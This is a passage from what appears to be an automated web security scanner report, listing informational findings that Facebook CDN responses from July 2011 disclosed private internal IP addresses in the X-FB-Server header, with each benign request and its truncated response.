The following RFC 1918 IP address was disclosed in the response:

10.27.36.102

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.ak.connect.facebook.com

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "7d655f9d1668265b1588d73c34b2e0b9"
X-FB-Server: 10.27.36.102
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=949
Expires: Sat, 23 Jul 2011 13:28:57 GMT
Date: Sat, 23 Jul 2011 13:13:08 GMT
Connection: close

/*1311124201,169550950,JIT Construction: v407899,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.57. http://static.ak.fbcdn.net/connect.php/css/share-button-css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect.php/css/share-button-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.110.127

Request

GET /connect.php/css/share-button-css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
ETag: "ee992e76ddeef4e2c619068f79da7e8b"
Vary: Accept-Encoding
X-FB-Server: 10.36.110.127
X-Cnection: close
Content-Type: text/css; charset=utf-8
Content-Length: 5414
Cache-Control: public, max-age=975
Expires: Thu, 21 Jul 2011 19:38:23 GMT
Date: Thu, 21 Jul 2011 19:22:08 GMT
Connection: close

/*1303255057,170591777,JIT Construction: v368160,en_US*/

.FBConnectButton_Simple,
.FBConnectButton_RTL_Simple{background-image:url(/images/connect_favicon.png);background-repeat:no-repeat;outline:non
...[SNIP]...

23.58. http://static.ak.fbcdn.net/connect.php/js/FB.Share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.1.45

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
ETag: "0ba1c557fb80ab93ad866a77c64a8a26"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.55.1.45
X-Cnection: close
Content-Length: 6584
Cache-Control: public, max-age=178
Expires: Thu, 21 Jul 2011 19:24:54 GMT
Date: Thu, 21 Jul 2011 19:21:56 GMT
Connection: close

/*1311224963,171376941,JIT Construction: v408591,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.59. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df339b1be3%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=1224
Expires: Sat, 23 Jul 2011 03:53:15 GMT
Date: Sat, 23 Jul 2011 03:32:51 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.60. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7eb1714491d5c%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.myyearbook.com%2F&layout=button_count&locale=en_US&node_type=link&ref=facebookLike_Link_HBL&sdk=joey&show_faces=false&width=90

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.184
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=1052
Expires: Thu, 21 Jul 2011 19:01:19 GMT
Date: Thu, 21 Jul 2011 18:43:47 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.61. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df180d7b77c%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=472
Expires: Sat, 23 Jul 2011 03:32:49 GMT
Date: Sat, 23 Jul 2011 03:24:57 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161ee90c6d315c%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.17.182
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=193
Expires: Thu, 21 Jul 2011 17:43:46 GMT
Date: Thu, 21 Jul 2011 17:40:33 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.63. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df102a706bf6c10c%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.183
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=461
Expires: Sat, 23 Jul 2011 03:55:30 GMT
Date: Sat, 23 Jul 2011 03:47:49 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.64. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18e2142842bf6%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.myyearbook.com%2F&layout=button_count&locale=en_US&node_type=link&ref=facebookLike_Link_HBL&sdk=joey&show_faces=false&width=90

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.183
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=415
Expires: Thu, 21 Jul 2011 18:06:31 GMT
Date: Thu, 21 Jul 2011 17:59:36 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.65. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161ee90c6d315c%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=1539
Expires: Thu, 21 Jul 2011 16:46:59 GMT
Date: Thu, 21 Jul 2011 16:21:20 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.66. http://static.ak.fbcdn.net/images/connect_sprite.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/images/connect_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /images/connect_sprite.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/connect.php/css/share-button-css

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 1916
Cache-Control: max-age=624942
Expires: Fri, 29 Jul 2011 00:58:06 GMT
Date: Thu, 21 Jul 2011 19:22:24 GMT
Connection: close

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...

23.67. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y-/r/L8yUExs-fkD.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/y-/r/L8yUExs-fkD.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 21 Jun 2011 20:06:11 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 3570
Vary: Accept-Encoding
Cache-Control: public, max-age=28959875
Expires: Wed, 20 Jun 2012 20:37:29 GMT
Date: Thu, 21 Jul 2011 16:12:54 GMT
Connection: close

/*1308688554,169776321*/

if (window.CavalryLogger) { CavalryLogger.start_js(["lR53h"]); }

var Live={logAll:false,startup:function(){Live.startup=bagofholding;Arbiter.subscribe(PresenceMessage.getArb
...[SNIP]...

23.68. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/C0OtqEd7THh.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y0/r/C0OtqEd7THh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /rsrc.php/v1/y0/r/C0OtqEd7THh.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 03:09:39 GMT
X-FB-Server: 10.138.16.182
Content-Length: 51496
Vary: Accept-Encoding
Cache-Control: public, max-age=31196977
Expires: Wed, 18 Jul 2012 15:09:01 GMT
Date: Sat, 23 Jul 2011 13:19:24 GMT
Connection: close

/*1311088157,176820406*/

body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embe
...[SNIP]...

23.69. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/hzcsbK-GAuH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/y3/r/hzcsbK-GAuH.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:06:45 GMT
X-FB-Server: 10.138.64.184
Content-Length: 20663
Vary: Accept-Encoding
Cache-Control: public, max-age=30754554
Expires: Wed, 11 Jul 2012 15:08:43 GMT
Date: Thu, 21 Jul 2011 16:12:49 GMT
Connection: close

/*1310483333,176832696*/

.connect_comment_widget{margin:0 4px;padding:5px 0;position:relative}
.connect_comment_widget .nub{background:transparent url(http://static.ak.fbcdn.net/rsrc.php/v1/zv/r/agyQ
...[SNIP]...

23.70. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/y3/r/jbHiQwYzYKQ.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 17:22:30 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 50010
Vary: Accept-Encoding
Cache-Control: public, max-age=31282196
Expires: Tue, 17 Jul 2012 17:42:50 GMT
Date: Thu, 21 Jul 2011 16:12:54 GMT
Connection: close

/*1311010937,169776318*/

if (window.CavalryLogger) { CavalryLogger.start_js(["T8H\/g"]); }

var XD={_callbacks:[],_opts:{autoResize:false,allowShrink:true,channelUrl:null,hideOverflow:false,newResize
...[SNIP]...

23.71. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3AaEMJaNiA.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/v3AaEMJaNiA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/y3/r/v3AaEMJaNiA.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Jul 2011 20:30:19 GMT
X-FB-Server: 10.138.16.183
Content-Length: 98675
Vary: Accept-Encoding
Cache-Control: public, max-age=31390061
Expires: Fri, 20 Jul 2012 20:47:06 GMT
Date: Sat, 23 Jul 2011 13:19:25 GMT
Connection: close

/*1311281174,176820407*/

if (window.CavalryLogger) { CavalryLogger.start_js(["x\/n2L"]); }

var NavigationMessage={NAVIGATION_BEGIN:'NavigationMessage/navigationBegin',NAVIGATION_SELECT:'NavigationMe
...[SNIP]...

23.72. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y4/r/eXHcpRoThZn.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/y4/r/eXHcpRoThZn.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 22:50:28 GMT
X-FB-Server: 10.138.16.185
Content-Length: 40477
Vary: Accept-Encoding
Cache-Control: public, max-age=31348122
Expires: Wed, 18 Jul 2012 12:01:31 GMT
Date: Thu, 21 Jul 2011 16:12:49 GMT
Connection: close

/*1311076918,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fZYUE"]); }

void(1);if(!window.skipDomainLower&&navigator&&navigator.userAgent&&document.domain.toLowerCase().match(/(^|
...[SNIP]...

23.73. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/yGAzEWR0-5b.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y4/r/yGAzEWR0-5b.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /rsrc.php/v1/y4/r/yGAzEWR0-5b.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sun, 17 Jul 2011 20:39:18 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 1971
Vary: Accept-Encoding
Cache-Control: public, max-age=31069918
Expires: Tue, 17 Jul 2012 03:51:24 GMT
Date: Sat, 23 Jul 2011 13:19:26 GMT
Connection: close

/*1310961096,169775811*/

if (window.CavalryLogger) { CavalryLogger.start_js(["ZK+ek"]); }

ConnectLogin={init:function(a){this.appID=a.appID;this.oneClick=a.oneClick;XD.init(a);},login:function(a,c,b
...[SNIP]...

23.74. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css previous next

Summary

Severity:	Information
